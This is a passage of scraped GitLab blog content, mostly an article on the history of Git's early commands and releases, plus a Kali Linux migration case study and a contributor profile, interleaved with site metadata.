3. Launch new blog post series\n\nSpeaking of experienced contributors, I’d like to highlight some of them with a new blog post series, since their experience working in the GitLab community will be helpful for new contributors. The first post features Core Team member [Vitaliy Klachkov](/blog/contributor-post-vitaliy/).\n\n## 4. Kick off Core Team meeting\n\nWe just kicked off a regular meeting with the [Core Team](/community/core-team/) to discuss topics of interest for the GitLab community. This recorded meeting will be open to anyone. 
The Core Team will also use [Service Desk](https://gitlab.com/gitlab-core-team/general/issues/service_desk) so that anyone in the community can view and participate in discussions.\n\nThanks for reading my blog post. Your feedback/questions are always welcome and you can reach me at rpaik@gitlab.com.\n\n## Interested in learning how you can contribute?\n\nA good place to start would be the [Contributing to GitLab page](/community/contribute/), where you can learn how you can contribute to GitLab code, documentation, and translation.\n",[267,779,9],{"slug":3485,"featured":6,"template":689},"join-the-gitlab-community","content:en-us:blog:join-the-gitlab-community.yml","Join The Gitlab Community","en-us/blog/join-the-gitlab-community.yml","en-us/blog/join-the-gitlab-community",{"_path":3491,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3492,"content":3498,"config":3503,"_id":3505,"_type":14,"title":3506,"_source":16,"_file":3507,"_stem":3508,"_extension":19},"/en-us/blog/journey-through-gits-20-year-history",{"title":3493,"description":3494,"ogTitle":3493,"ogDescription":3494,"noIndex":6,"ogImage":3495,"ogUrl":3496,"ogSiteName":673,"ogType":674,"canonicalUrls":3496,"schema":3497},"Journey through Git's 20-year history","Follow along as we reminisce about the first commit, the unique aspects of the earliest releases, and the confusion sparked by an update to the git-push(1) default behavior.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097380/Blog/Hero%20Images/Blog/Hero%20Images/git-20-years-opt2_TWNsNk8KH43b3jP0KLD0U_1750097380123.png","https://about.gitlab.com/blog/journey-through-gits-20-year-history","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Journey through Git's 20-year history\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Patrick Steinhardt\"}],\n        \"datePublished\": \"2025-04-14\",\n      
}",{"title":3493,"description":3494,"authors":3499,"heroImage":3495,"date":3500,"body":3501,"category":10,"tags":3502},[747],"2025-04-14","The Git project has just turned 20 years old. A lot has happened during these years, and while the conceptual design of Git hasn't changed significantly since its inception, the way users interact with the tool has changed quite significantly. We at GitLab are proud to build on top of this critical piece of software and to be part of its history.\n\nJoin us on a journey through Git's history to explore how it has evolved over the years.\n\n## The first commit\n\nThe first commit was made on April 7, 2005, by Linus Torvalds, the creator of the Linux kernel: `e83c5163316 (Initial revision\nof \"git\", the information manager from hell, 2005-04-07)`.\n\nAs we can see, this\ncommit does not contain a lot of files:\n\n```shell\n$ git ls-tree e83c5163316\n100644 blob a6bba79ba1f46a1bbf7773449c3bd2bb9bf48e8b\tMakefile\n100644 blob 27577f76849c09d3405397244eb3d8ae1d11b0f3\tREADME\n100644 blob 98a32a9ad39883c6d05a000a68511d4b1ee2b3c7\tcache.h\n100644 blob 74a0a234dd346fff51c773aa57d82fc4b83a8557\tcat-file.c\n100644 blob 840307af0cfaab31555795ce7175d5e9c9f981a0\tcommit-tree.c\n100644 blob 25dc13fe101b219f74007f3194b787dd99e863da\tinit-db.c\n100644 blob c924a6e0fc4c36bad6f23cb87ee59518c771f936\tread-cache.c\n100644 blob 1b47742d8cbc0d98903777758b7b519980e7499e\tread-tree.c\n100644 blob b8522886a15db861508fb6d03d4d88d6de912a4b\tshow-diff.c\n100644 blob 5085a5cb53ee52e1886ff6d46c609bdb2fc6d6cd\tupdate-cache.c\n100644 blob 921f981353229db0c56103a52609d35aff16f41b\twrite-tree.c\n```\n\nIn addition to build infrastructure, the first commit provides seven top-level commands:\n\n- `init-db` to initialize a new Git repository\n- `update-cache` to add files to the index\n- `write-tree` to take what is in the index and create a new tree from it\n- `read-tree` to read a tree object\n- `commit-tree` to create a commit from a tree\n- `cat-file` to read 
a specific object into a temporary file\n\nNote that the `git` command itself did not yet exist at this point in time.\nInstead, these commands had to be executed directly.\n\nAs example, let's create a\nnew repository:\n\n```shell\n$ mkdir repo\n$ cd repo\n$ init-db\ndefaulting to private storage area\n$ ls -a\n.  ..  .dircache\n```\n\nThat looks quite unfamiliar: There is no `.git` directory, but there is a\n`.dircache` directory. And where was the private storage area?\n\nThe early design of Git distinguished between a \"shared\" and \"private\" object\nstorage area. This object storage area was where all of your Git objects went. For example, your\ncommits and blobs.\n\nBy default, `init-db` created a private object storage area that was only used for\nthe managed directory that it was created in. A \"shared\" object storage area, on\nthe other hand, shared object content across multiple managed directories so\nthat the same object did not need to be stored twice.\n\n### Create a commit\n\nSo, now that we have a repository, how did we create a commit? Well, it isn't as\neasy as today's `git add . && git commit`. Instead, you had to:\n\n1. Update the index by calling `update-cache` for every file that you want to\n   add.\n1. Write a new tree by calling `write-tree`, which takes everything you have\n   added to the index.\n1. Set up environment variables to tell Git who you are.\n1. Write a commit object by calling `commit-tree`.\n\nLet’s create a commit in the repository:\n\n```shell\n$ echo content-1 >file-a\n$ update-cache file-a\n$ echo content-2 >file-b\n$ update-cache file-b\n$ write-tree\n3f143dfb48f2d84936626e2e5402e1f10c2050fb\n$ export COMMITTER_NAME=\"Patrick Steinhardt\"\n$ export COMMITER_EMAIL=ps@pks.im\n$ echo \"commit message\" | commit-tree 3f143dfb48f2d84936626e2e5402e1f10c2050fb\nCommitting initial tree 3f143dfb48f2d84936626e2e5402e1f10c2050fb\n5f8e928066c03cebe5fd0a0cc1b93d058155b969\n```\n\nThis isn't exactly ergonomic, but it works! 
Let's have a look at the generated\ncommit:\n\n```shell\n$ cat-file 5f8e928066c03cebe5fd0a0cc1b93d058155b969\ntemp_git_file_rlTXtE: commit\n$ cat temp_git_file_rlTXtE\ntree 3f143dfb48f2d84936626e2e5402e1f10c2050fb\nauthor Patrick Steinhardt \u003Cps@pks.im> Wed Mar 26 13:10:16 2025\ncommitter Patrick Steinhardt \u003Cps@pks.im> Wed Mar 26 13:10:16 2025\n\ncommit message\n```\n\nNote that `cat-file` didn't print the contents directly, but instead wrote\nit into a temporary file first. But the contents of the file looked exactly how a\nmodern commit would look.\n\n### Making changes\n\nNow that we have files, how do we get their status? You might have guessed it:\nthis could be done with `show-diff`:\n\n```shell\n$ show-diff\nfile-a: ok\nfile-b: ok\n\n$ echo modified-content >file-a\n$ show-diff\n--- -\t2025-03-26 13:14:53.457611094 +0100\n+++ file-a\t2025-03-26 13:14:52.230085756 +0100\n@@ -1 +1 @@\n-content-1\n+modified-content\nfile-a:  46d8be14cdec97aac6a769fdbce4db340e888bf8\nfile-b: ok\n```\n\nAmazingly, `show-diff` even knew to already generate diffs between the old and\nnew state of modified files! Funny enough though, Git achieved this by simply\nexecuting the diff(1) Unix tool.\n\nIn summary, all of this was still rather bare-bones, but it performed all of the\nnecessary duties to track history. There were still many limitations:\n\n- There was no easy way yet to switch between commits.\n- There was no way to show logs.\n- There were no branches, tags, or even references. Users were expected to manually\n  keep track of object IDs.\n- There was no way to synchronize two repositories with one another. Instead,\n  users were expected to use rsync(1) to synchronize the `.dircache` directories.\n- There was no way to perform merges.\n\n## Git 0.99\n\nThe first test release of Git was Version 0.99. This release came only two months after\nthe initial commit, but already contained 1,076 commits. There had been almost 50\ndifferent developers involved. 
The most frequent committer at this point was\nLinus himself, but he was closely followed by Junio Hamano, the current maintainer.\n\nA lot of things had changed since the initial commit:\n\n- Git started to track different development branches by using references, which\n  in most cases removes the need to manually track object IDs.\n- There was a new remote protocol that allows two repositories to exchange\n  objects with one another.\n- The `.dircache` directory was renamed to `.git`.\n- It became possible to merge single files with one another.\n\nThe most important visible change, though, was the introduction of\nthe top-level `git` command and its subcommands. Interestingly, this release\nalso created the notion of \"plumbing\" and \"porcelain\" commands:\n\n- \"Plumbing\" tools are the low-level commands that access the underlying Git\n  repository.\n- \"Porcelain\" tools are shell scripts that wrap the plumbing commands to provide\n  a nicer, high-level user interface.\n\nThis split still exists nowadays as documented in\n[`git(1)`](https://git-scm.com/docs/git#_high_level_commands_porcelain), but because \nmost porcelain tools have been rewritten from shell scripts to C, the line between these two\ncategories has started to blur significantly.\n\n## Linus hands over maintainership\n\nLinus never started Git out of love for version control systems, but because there was a need to replace BitKeeper for Linux kernel development. As such, he never planned to keep maintaining Git forever. The intent was to maintain it until someone trustworthy stepped up.\n\nThat someone was Junio Hamano. Junio got involved in Git about a week after Linus’s first commit and already had a couple of hundred commits in the history after the Git 0.99 release. So, on July 26, 2005, [Linus made Junio the new maintainer of the Git project](https://lore.kernel.org/git/Pine.LNX.4.58.0507262004320.3227@g5.osdl.org/). 
While Linus has continued to contribute to Git, his involvement with the project faded over time, which is only natural considering that he is quite busy as head of the Linux project.\n\nJunio is still leading the Git project today.\n\n## Git 1.0\n\nThe first major release of Git happened on December 21, 2005, by\nJunio. Interestingly enough, there had been 34 releases between Version 0.99\nand Version 1.0: 0.99.1 to 0.99.7, 0.99.7a to 0.99.7d, 0.99.8 to 0.99.8g, and\n0.99.9 up to 0.99.9n.\n\nOne of the more important milestones since 0.99 was probably the addition of the `git-merge(1)`\ncommand that allows one to merge two trees with one another. This is in stark\ncontrast to before, where one had to basically script the merges file by file.\n\n### Remotes\n\nAnother significant change was the introduction of shorthand notation for\nremote repositories. While Git already knew how to talk to remote repositories,\nusers always had to specify the URL to fetch from every single time they wanted\nto fetch changes from it. This was quite unfriendly to the users, because, typically, they wanted to interact with the same remote over and over again.\n\nYou may know about how remotes work now, but the mechanism that existed at  \nthis point in time was still significantly different. There was no `git-remote(1)`  \ncommand that you could use to manage your remotes. Remotes weren't even stored  \nin your `.git/config` file. In fact, when remotes were first introduced in  \nVersion 0.99.2, Git didn't even *have* config files.\n\nInstead, you had to configure remotes by writing a file into the  \n`.git/branches` directory, which nowadays feels somewhat counterintuitive. But  \nthe mechanism still works today:\n\n```shell\n$ git init repo --\nInitialized empty Git repository in /tmp/repo/.git/\n$ cd repo\n$ mkdir .git/branches\n$ echo https://gitlab.com/git-scm/git.git >.git/branches/origin\n$ git fetch origin refs/heads/master\n```\n\nBut that isn't all! 
The directory was soon renamed in Git Version 0.99.5 to \"remotes\", so there are a total of three different ways to configure remotes in a modern Git client.\n\nMost of you have probably never used either `.git/branches` nor `.git/remotes`,  \nand both of these mechanisms have been deprecated since 2005 and 2011,  \nrespectively. Furthermore, these directories will finally be removed in Git 3.0.\n\n## Git branding\n\nIn 2007, the first Git logo was created. It’s arguable if you can call it a logo, because it only consisted of three red minus signs above three green plus signs, reflecting what the output of `git diff` looks like:\n\n![three red minus signs above three green plus signs, reflecting what the output of `git diff`](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097388/Blog/Content%20Images/Blog/Content%20Images/image3_aHR0cHM6_1750097387927.png)\n\nA bit later, in 2008, the website [git-scm.com](https://git-scm.com) was launched:\n\n![landing page for git-scm.com in 2006](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097388/Blog/Content%20Images/Blog/Content%20Images/image4_aHR0cHM6_1750097387930.png)\n\nIn 2012, the Git website was [revamped](https://lore.kernel.org/git/CAP2yMaJy=1c3b4F72h6jL_454+0ydEQNXYiC6E-ZeQQgE0PcVA@mail.gmail.com/) by Scott Chacon and Jason Long. It looks pretty similar to how it looks today:\n\n![git website revamped in 2012](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097388/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750097387932.png)\n\nThis site redesign sports the new red-orange logo designed by Jason Long; the same logo that's currently used:\n\n![git logo](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097388/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097387934.png)\n\n## Git 2.0\n\nGit already started to look a lot like modern Git at the 1.0 release, so we\nare going to do a big historical jump to Git 2.0. 
This version was\nreleased around 10 years after Git 1.0 and was the first release that\nintentionally contained backwards-incompatible changes in central workflows.\n\n### `git-push(1)` default behavior\n\nThe change that arguably caused most the confusion in this release was the\nupdated default behavior of `git-push(1)`.\n\nThere are a couple of different actions that Git could take when you push\ninto a remote repository and don’t specify exactly what you want to push:\n\n- Git could refuse to do anything, asking you to provide more information of\n  what exactly you want to push.\n- Git could push the currently checked out branch.\n- Git could push the currently checked out branch, but only if it knows that it\n  has an equivalent on the remote side.\n- Git could push all of your branches that have an equivalent on the remote side.\n\nThe behavior of modern Git is the so-called \"simple\" strategy, which is the third\noption above. But before Git 2.0, the default behavior was the \"matching\"\nstrategy, which is the last option.\n\nThe “matching” strategy was significantly more risky. You always had to make sure that you\nwere fine with pushing all of your local branches that have an equivalent on the\nremote side before pushing. Otherwise, you might have ended up\npushing changes unintentionally. As such, it was decided to change the strategy\nto \"simple\" to reduce the risk and help out Git beginners.\n\n### `git-add(1)`\n\nAnother big change was the default behavior of `git-add(1)` when it comes to  \ntracked files that have been deleted. Before Git 2.0, `git-add(1)` wouldn't  \nstage deleted files automatically, but you instead had to manually add each  \ndeleted file by using `git-rm(1)` to make them part of a commit. 
With Git 2.0, this behavior was changed so that `git-add(1)` also adds deleted files to the index.\n\n## Celebrating the Git community\n\nI won’t bore you with the details around how Git works nowadays – you probably use it daily anyway, and, if you don’t, there are many tutorials out there that can help you get started. Instead, let’s celebrate the Git community, which has ensured that Git works as well as it does 20 years later.\n\nOver time, Git has:\n\n- Accumulated 56,721 commits as of the Git 2.49 release.\n- Received contributions from more than 2,000 different individuals.\n- Published 60 major releases.\n\nThe Git project also has a steady influx of new contributors by taking part in [Google Summer of Code](https://summerofcode.withgoogle.com/) and [Outreachy](https://www.outreachy.org/). New contributors like these are what will ensure that the Git project will remain healthy in the long term.\n\nAs such, let me extend a big thank you to all contributors. It is your contributions that have made Git possible.\n\n## Going forward\n\nIt should be an uncontroversial take to say that Git has essentially won the competition of version control systems. It has significant market share, and it isn't easy to find open source projects that are using a version control system other than Git. So it has clearly done a lot of things right.\n\nThat being said, its development hasn't stood still, and there are still many challenges ahead of Git. 
On the one hand, we have technical challenges:\n- modernization of an aging code base  \n- scaling with the ever-growing size of monorepos  \n- handling large binary files better\n\nAnd on the other hand, there are problems of a more social type:\n- improving the usability of Git  \n- fostering the Git community so that the project remains healthy in the long  \n  term\n\nThere always remains work to be done and we at GitLab are proud to be part  \nof these efforts to make sure that Git continues to be a great version control  \nsystem for the next 20 years.\n\n## Read more about Git\n\n- [Celebrating Git's 20th anniversary with creator Linus Torvalds](https://about.gitlab.com/blog/celebrating-gits-20th-anniversary-with-creator-linus-torvalds/)\n- [What's new in Git 2.49.0?](https://about.gitlab.com/blog/whats-new-in-git-2-49-0/)  \n- [What’s new in Git 2.48.0?](https://about.gitlab.com/blog/whats-new-in-git-2-48-0/)  \n- [A beginner's guide to the Git reftable format](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/)",[9,751],{"slug":3504,"featured":91,"template":689},"journey-through-gits-20-year-history","content:en-us:blog:journey-through-gits-20-year-history.yml","Journey Through Gits 20 Year History","en-us/blog/journey-through-gits-20-year-history.yml","en-us/blog/journey-through-gits-20-year-history",{"_path":3510,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3511,"content":3516,"config":3522,"_id":3524,"_type":14,"title":3525,"_source":16,"_file":3526,"_stem":3527,"_extension":19},"/en-us/blog/kali-linux-movingtogitlab",{"title":3512,"description":3513,"ogTitle":3512,"ogDescription":3513,"noIndex":6,"ogImage":2556,"ogUrl":3514,"ogSiteName":673,"ogType":674,"canonicalUrls":3514,"schema":3515},"Kali Linux: Growing Community Contributions with GitLab","Since moving to GitLab in 2019, Kali Linux has gone from company-only contributions to a growing number of community 
contributions.","https://about.gitlab.com/blog/kali-linux-movingtogitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How GitLab helped Kali Linux attract a growing number of community contributions\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Nuritzi Sanchez\"}],\n        \"datePublished\": \"2021-02-18\",\n      }",{"title":3517,"description":3513,"authors":3518,"heroImage":2556,"date":3519,"body":3520,"category":10,"tags":3521},"How GitLab helped Kali Linux attract a growing number of community contributions",[2773],"2021-02-18","[Kali Linux](https://www.kali.org/) is a well-loved Debian-based Linux distribution aimed at advanced [Penetration Testing](https://en.wikipedia.org/wiki/Penetration_test) and Security Auditing. We sat down with Ben Wilson ([@g0tmi1k](https://twitter.com/g0tmi1k)), senior developer at Kali, to hear more about why Kali Linux moved to GitLab and see if they've noticed any changes to their project since adopting GitLab as their DevOps solution.\n\n## Why did you decide to move to GitLab?\n\nWe decided to move from Gitolite to GitLab around April 2019 to make it possible for our community to contribute to Kali. Our previous setup didn't allow anyone to sign up, so the community couldn't help out. Another complication was using a mixture of services such as Google Docs and Phabricator, and we wanted to condense our tool stack. We love that GitLab is a single platform for the whole software development lifecycle.\n\n>> One thing that was important for us is that we didn't want to reinvent the wheel. We tried to choose something open-source with advanced functionality, an active community, and a company behind it. 
GitLab ticked every box.\n\nAnother factor for our decision was that [GitLab's API is significantly more feature-rich than competitor APIs](https://docs.gitlab.com/ee/api/), which allowed us to automate and integrate into anything that we wanted. For example, we can fully automate the process of remotely forking a repository then apply our configurations.\n\nThat way, we don't have to download a git repository only to push it up again. This is a big time-saver for us and significantly simplifies the workflow. Some of the configuration that we can now automatically apply are:\n\n * Being able to drop the relationship between forks\n * Configure the default branch\n * Disable unused features for a repository (e.g., not everything requires their own wiki)\n * Populate a description for the repository\n * Set up CI paths\n * Set up email notification on any activity to our private mailing list\n\nWe take advantage of various open source tools that leverage GitLab's API, such as [Debian Salsa](https://www.phoronix.com/scan.php?page=news_item&px=Debian-Salsa-Beta). We can use these tools to automate things like updates to email distribution lists and our configuration of GitLab admin settings and repository structure. We contribute any changes we make to these tools back upstream so that other communities can leverage GitLab's API's power the way we do.\n\nAn additional perk to GitLab is its usability. The way you can organize projects makes it a more intuitive experience for people who want to contribute. For example, having sub-groups and projects allows us to keep a clean layout in a folder-like structure. For those interested, you can see how we've organized the [Kali project in GitLab](https://gitlab.com/kalilinux).\n\n## How are you using GitLab at Kali Linux?\n\nWe're using GitLab's [top-tier SaaS version](/pricing/), which is hosted on GitLab.com, thanks to the [GitLab for Open Source program](/solutions/open-source/). 
Using this version and hosting it on GitLab is easier for us because it's less infrastructure to maintain. We have many unique pieces of infrastructure so it's nice to reduce the load when we can. We're using a wide range of features to manage the entire Kali Linux project, consisting of 564 active repositories.\n\nSome of the most essential [GitLab features](/pricing/feature-comparison/) for us are:\n\n*   **Source Code Management**: We're using GitLab to host the source code to all our packages and build scripts and custom tools.\n*   **[Wiki](https://docs.gitlab.com/ee/user/project/wiki/#wiki)**: We use the wiki functionality for internal documentation. Markdown makes it easy for everyone to contribute.\n*   **[Project management](/solutions/agile-delivery/)**: We track tasks and short/long term goals with GitLab as well as the timelines for our project. We use issue tracking, threads, labels, milestones, weights, and everything else designed for project management.\n*   **[User Permissions](https://docs.gitlab.com/ee/user/permissions.html#permissions)**: We like the functionality of GitLab's user permissions, which allows us to have \"one-off\" users on specific projects as well as automatic expiration after a particular time.\n*   **[Security](https://docs.gitlab.com/ee/user/application_security/)**: As a cybersecurity-focused Linux distro, security is paramount to us. 
We like that [GitLab has 2FA and project access tokens](https://docs.gitlab.com/ee/security/).\n*   **[Analytics](https://docs.gitlab.com/ee/user/analytics/)**: We are still discovering the functionality here, but we like seeing user statistics around code review and contribution.\n*   **Performance**: We're able to use GitLab's [Content Delivery Network (CDN)](https://en.wikipedia.org/wiki/Content_delivery_network) for great performance across the globe.\n\nWe're hoping to leverage [GitLab's CI/CD features](/solutions/continuous-integration/) and the [container management capabilities](https://docs.gitlab.com/ee/user/packages/container_registry/) more regularly in the near future.\n\nWe're also looking to use [GitLab Pages](https://docs.gitlab.com/ee/user/project/pages/) for hosting our website instead of our self-hosted WordPress instance. By using [Hugo](https://gohugo.io/hosting-and-deployment/hosting-on-gitlab/), we can write the content with a mixture of HTML and Markdown. Hugo makes it very simple, easy to update, and has straightforward change tracking. GitLab Pages then can serve up the [static output](https://docs.gitlab.com/ee/user/project/web_ide/index.html).\n\nThere were several problems we were facing with WordPress that made us consider moving away, such as plugins that weren't properly maintained, security issues that made us require VPN access to admin pages. The other benefits to the move are that static pages will load faster, and our community can help fix typos on our website through merge requests. Once we make the move to GitLab Pages, we'll start to make greater use of GitLab's CI/CD functions to statically generate the websites.\n\nAnother thing we're becoming more familiar with is all of GitLab's project management features. One of the reasons we chose GitLab instead of other DevOps tools is that it's a single platform for the whole software development lifecycle, and we're looking to use more of its features. 
Since we're on the top-tier SaaS plan, we have every functionality available to us and we're eager to make use of it.\n\n## What are some of the changes you've noticed in your open-source community since starting to use GitLab?\n\nThe most significant change is that we only allowed contributions from employees before moving to GitLab. Since the switch to GitLab, we've adopted a new mindset and now allow anyone to help out.\n\n>> GitLab's user-friendly design has made it easy for our community to get started, and we've started to receive merge requests from the public as well as bug reports and bug fixes.\n\nIt's been exhilarating to see these contributions land! We are working on increasing these contributions in 2021 with a \"Kali Summer of Code\" and are considering doing a giveaway for people who have made a significant contribution.\n\nWe've also experienced changes to our development practices. For example, we can now have more effective discussions about commit differences and can link to individual commits to pinpoint problems. It's easier to update items from the internal wiki, edit web pages, and merge requests. I also like that GitLab has a built-in automatic save feature to help when you're drafting something and either multitasking or on-the-go.\n\nFinally, GitLab's to-dos and long-term planning features allow us to plan ahead for the future of Kali development. For example, we've replaced ad-hoc solutions done by individuals via emails and to-do list text files on each person's computer since moving to GitLab.\n\n## What are some challenges you've had with implementing GitLab for your community? How did you overcome those challenges?\n\nDuring the switchover from the old system to GitLab, we discovered various things that were hardcoded.\n\nTo help with this, we automated a find and replace, and followed up with various manual searches to ensure that all links and references were located. This ended up taking about two hours. 
We also left the old web server up for a year, which pointed to the new URL structure to ensure that there weren't any missing links and references. We redid the layout of the site, so it took a while to recreate all the redirects.\n\nAnother challenge was the sheer size of Kali. We had to import roughly 1,000 repositories when we set up GitLab. We managed to migrate most of them in a day and completed the migration within a week once we managed to get the group structure in place. We set up separate groups for different access levels to repositories for build scripts, internal non-public files, Android, phone, build scripts, store, packages, recipes, tools, and websites.\n\nImporting other items (code packages, build scripts, and custom tools from our self-hosted git) took longer because they were in many different formats. When we did the import we cleaned up to determine which items were no longer in use and archived them. The next step was making sure our custom tools were hosted on GitLab and then configuring the tools and packages appropriately. Next, we imported several repositories. We also needed to create files that were not previously tracked in our repository. Finally, we converted our WordPress-based content to Markdown using an [open source project](https://github.com/lonekorean/wordpress-export-to-markdown), then manually verified and cleaned it up.\n\nWe chose not to carry over existing issues because we wanted to have a clean start. In general, we only imported what was important. Everything we ended up with is what we cared about and what we wanted to track.\n\n## What do you think GitLab is doing well in supporting open source communities, and what should GitLab do to improve in this area?\n\nWe really like that GitLab has an outreach program for open source projects with dedicated people for the job role. 
They actively contacted us to become a [GitLab Open Source Partner](/solutions/open-source/partners/) and we're glad to have joined as one!\n\nOne of the things that we appreciate about GitLab is that the company is open source. The transparency that comes with that allows us, and anyone else, to see the company's progress. GitLab is setting an example for how open source companies can work alongside their communities, and it's something we are learning from too.\n\n## What advice would you have for other open source communities that are looking to implement GitLab?\n\nThe sooner you make the switch, the easier and better! Once you move, you'll see that it's less work to maintain and there are more features to use.\n\nWhen beginning your migration, make sure to set up a test project first to help plan the structure ahead of doing the main project switch. Look up and explore features ahead of time so you know what GitLab can do rather than discover the functionality when using it. GitLab has a [GitLab Learn portal](/learn/), which we hear is going to continue to be improved to help with user education.\n\n## What are some of the new things on the horizon for Kali Linux?\n\n*   [KaBoxer](https://gitlab.com/kalilinux/tools/kaboxer): A framework to manage applications in containers on Kali\n*   New kali.org website using GitLab Pages\n*   Programs to increase community contributions to Kali\n\n## Is there anything else you'd like to share with us that we haven't asked you?\n\nWe have only scratched the surface of what GitLab has offered - and they keep putting in more features. We are planning on taking their upcoming training to make sure we are fully up-to-date on their offerings.\n\n## Last but certainly not least, we have heard a rumor that the founders of Kali are so dedicated to the project that they have Kali logo tattoos. Is this true?\n\nVery true! 
The original founders both have Kali tattoos, as do various current members.\n\nWe also have some pretty cute baby onesies that are a hit.\n\n![A baby in a Kali Linux onesie](https://about.gitlab.com/images/blogimages/kali_linux_baby.jpg){: .shadow.medium.center}\nKali Linux has some cute baby onesies. [CC BY-SA 4.0](https://creativecommons.org/licenses/by-sa/4.0/) Ben Wilson\n{: .note.text-center}\n\n## About Kali Linux\n\n[Kali Linux](https://www.kali.org/) (formerly known as BackTrack-Linux) is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali Linux contains several hundred tools targeted toward various information security tasks, such as Penetration Testing, Forensics, and Reverse Engineering. Kali Linux is a multi platform solution, accessible and freely available to information security professionals and hobbyists.\n",[9,267,910],{"slug":3523,"featured":6,"template":689},"kali-linux-movingtogitlab","content:en-us:blog:kali-linux-movingtogitlab.yml","Kali Linux Movingtogitlab","en-us/blog/kali-linux-movingtogitlab.yml","en-us/blog/kali-linux-movingtogitlab",{"_path":3529,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3530,"content":3535,"config":3540,"_id":3542,"_type":14,"title":3543,"_source":16,"_file":3544,"_stem":3545,"_extension":19},"/en-us/blog/katrin-contributor-post",{"title":3531,"description":3532,"ogTitle":3531,"ogDescription":3532,"noIndex":6,"ogImage":1192,"ogUrl":3533,"ogSiteName":673,"ogType":674,"canonicalUrls":3533,"schema":3534},"Meet GitLab Contributor Katrin Leinweber","Katrin Leinweber shares her experience contributing to GitLab documentation and translations.","https://about.gitlab.com/blog/katrin-contributor-post","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Meet GitLab Contributor Katrin Leinweber\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        
\"datePublished\": \"2019-07-17\",\n      }",{"title":3531,"description":3532,"authors":3536,"heroImage":1192,"date":3537,"body":3538,"category":10,"tags":3539},[704],"2019-07-17","\n\nFor this edition of the [GitLab contributor blog posts](/blog/tags.html#contributors), I'm\nexcited to introduce [Katrin Leinweber](https://gitlab.com/katrinleinweber). Let's get to know more about her!\n\n### Can you tell us where you live and what you like about your area?\n\nI live in [Hanover, Germany](https://www.google.com/maps/place/Hanover,+Germany/@52.3815678,9.6148482,10.97z/data=!4m5!3m4!1s0x47b00b514d494f85:0x425ac6d94ac4720!8m2!3d52.3758916!4d9.7320104),\nwhich is transitioning from a car manufacturing hub to a more modern and diversified city.\nThe city is reasonably bicycle friendly with large parks and gardens, which are worth a visit.\nI don't find Hanover too touristy, which is probably a plus for us citizens.\n\n### How long have you used GitLab and why did you want to make a contribution?\n\nI started using GitLab CE at my university in April 2015 as a backup server for my PhD thesis,\ndata analysis scripts, etc. [My first merge request](https://gitlab.com/gitlab-com/www-gitlab-com/merge_requests/6531)\nwas simply fixing a typo in a blog post.\n\n### You also help translating GitLab into German. How is that different from making contributions via MRs and why is translating GitLab important to you?\n\nLocalization is one of the tasks that got me into contributing to open source software projects in general.\nEven though I myself don't need a localized UI, I think it's valuable to many people to be able to\nuse a complex software in their native language. 
Since I think that GitLab has\n[valuable uses beyond programming](https://openbiblio.social/@katrinleinweber/102258903864249981),\nI hope lowering the barrier to entry for non-programmers will help support those use cases.\nAlso for me, doing quick translations is a sort of productive procrastination.\n\n![Canoeing on Hanover's river Leine (image credit Corinna John, [NABU Laatzen](https://www.nabu-laatzen.de/)](https://about.gitlab.com/images/blogimages/Katrin_Leinweber.jpg){: .shadow.medium.center}\nCanoeing on Hanover's river Leine\n{: .note.text-center}\n\n### What has been your experience contributing to GitLab?\n\nTechnically, it's pretty straightforward and something people should be familiar with if\nthey've contributed to other projects or used tools like GitHub. Every time I contribute,\nI feel like I'm living (in) the future where projects allow people to change something of theirs.\n\nHowever, we shouldn't forget that \"No, this Wiki page is only editable by colleagues in the XYZ department\"\nis still the default in so many work environments. So the future isn't quite here for everyone yet.\n\nOne of the things that bothers me about GitLab's contribution process is the fact that even simple changes\n– like documentation updates – get pushed into the same CI pipeline as code changes in many cases.\nIt seems like a waste of electricity. Maybe not in terms of absolute kWh, but since the risk of anything\nbreaking due to a typo fix or an updated hyperlink is almost zero, those kWh are effectively wasted.\nThere should be a smarter way to minimize human effort in preventing build breakages than to use\nmore CPU cycles for testing. 
We all know that humanity can't afford to waste resources anymore.\n\nIn that vein, I wouldn't mind seeing GitLab also supporting the renewable energy industry as\nI don't see that listed in the\n[market segmentation page](/handbook/marketing/strategic-marketing/market-segmentation/#oil--gasenergy) yet.\n\n### Do you participate in other open source projects? If yes, what do you like about other communities and what are some of the things that GitLab can learn?\n\nI do, for example in [The Carpentries](https://carpentries.org/teach/), which provides Open Educational\nResources and basic programming training for researchers. I find the GitLab community is\nquite thoughtful about sharing what they learn about successfully pushing the product and\nthe company forward. So I think other open source projects will find lots of advice in GitLab's\nblog and handbook that is worth considering.\n\n### What do you like to do when you're not working?\n\nI enjoy gardening and going cycling, hiking, and canoeing.\n\n### Anything else you want to share with the community?\n\nWherever appropriate, use [`[skip ci]`](https://docs.gitlab.com/ee/ci/pipelines/#skip-a-pipeline)\nmore often in your commit messages and MR titles.\n\n## Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can\nlearn how you can contribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,9,708],{"slug":3541,"featured":6,"template":689},"katrin-contributor-post","content:en-us:blog:katrin-contributor-post.yml","Katrin Contributor 
